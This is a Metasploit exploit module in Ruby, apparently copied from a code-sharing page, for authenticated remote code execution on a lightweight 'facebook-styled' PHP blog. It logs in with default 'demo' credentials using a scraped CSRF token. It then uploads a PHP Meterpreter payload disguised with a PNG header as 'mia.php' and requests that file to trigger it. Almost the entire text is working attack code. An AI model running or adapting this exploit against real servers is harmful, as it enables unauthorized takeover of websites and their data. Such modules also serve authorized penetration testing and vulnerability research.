扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 |
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Lightweight facebook-styled blog authenticated remote code execution", 'Description'=> %q{ This module exploits the file upload vulnerability of Lightweight self-hosted facebook-styled PHP blog and allows remote code execution. }, 'License'=> MSF_LICENSE, 'Author' => [ 'Maide Ilkay Aydogdu <ilkay@prodaft.com>' # author & msf module ], 'References' => [ ['URL', 'https://prodaft.com'] ], 'DefaultOptions'=> { 'SSL' => false, 'WfsDelay' => 5, }, 'Platform' => ['php'], 'Arch' => [ ARCH_PHP], 'Targets'=> [ ['PHP payload', { 'Platform' => 'PHP', 'Arch' => ARCH_PHP, 'DefaultOptions' => {'PAYLOAD'=> 'php/meterpreter/bind_tcp'} } ] ], 'Privileged' => false, 'DisclosureDate' => "Dec 19 2018", 'DefaultTarget'=> 0 )) register_options( [ OptString.new('USERNAME', [true, 'Blog username', 'demo']), OptString.new('PASSWORD', [true, 'Blog password', 'demo']), OptString.new('TARGETURI', [true, 'The URI of the arkei gate', '/']) ] ) end def login res = send_request_cgi( 'method'=> 'GET', 'uri' => normalize_uri(target_uri.path), ) cookie = res.get_cookies token = res.body.split('":"')[1].split('"')[0] # token = res.to_s.scan(/"[abcdef0-9]{10}"}/)[0].to_s.tr('"}', '') print_status("Got CSRF token: #{token}") print_status('Logging into the blog...') res = send_request_cgi( 'method'=> 'POST', 'uri' => normalize_uri(target_uri.path, 'ajax.php'), 'headers' => { 'Csrf-Token' => token, }, 'cookie' => cookie, 'data'=> "action=login&nick=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}", ) if res && res.code == 200 print_good("Successfully logged in with #{datastore['USERNAME']}") json = res.get_json_document if json.empty? && json['error'] print_error('Login failed!') return nil, nil end else print_error("Login failed! Status code #{res.code}") return nil, nil end return cookie, token end def exploit cookie, token = login unless cookie || token fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed") end data = Rex::MIME::Message.new # jWPU1tZmoAZgooopowaNGjRq0KhBowaNGjRqEHYAALgBALdg7lyPAAAAAElFTkSuQmCC png = Base64.decode64('iVBORw0KGgoAAAANSUhEUgAAABgAAAAbCAIAAADpgdgBAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAJElEQVQ4') # only the PNG header data.add_part(png+payload.encoded, 'image/png', 'binary', "form-data; name=\"file\"; filename=\"mia.php\"") print_status('Uploading shell...') res = send_request_cgi( 'method'=> 'POST', 'uri' => normalize_uri(target_uri.path,'ajax.php'), 'cookie' => cookie, 'vars_get' => { 'action' => 'upload_image' }, 'headers' => { 'Csrf-Token' => token, }, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data'=> data.to_s, ) # print_status(res.to_s) if res && res.code == 200 json = res.get_json_document if json.empty? || !json['path'] fail_with(Failure::UnexpectedReply, 'Unexpected json response') end print_good("Shell uploaded as #{json['path']}") else print_error("Server responded with code #{res.code}") print_error("Failed to upload shell") return false end send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, json['path'])}, 3 ) print_good("Payload successfully triggered !") end end |
体验盒子
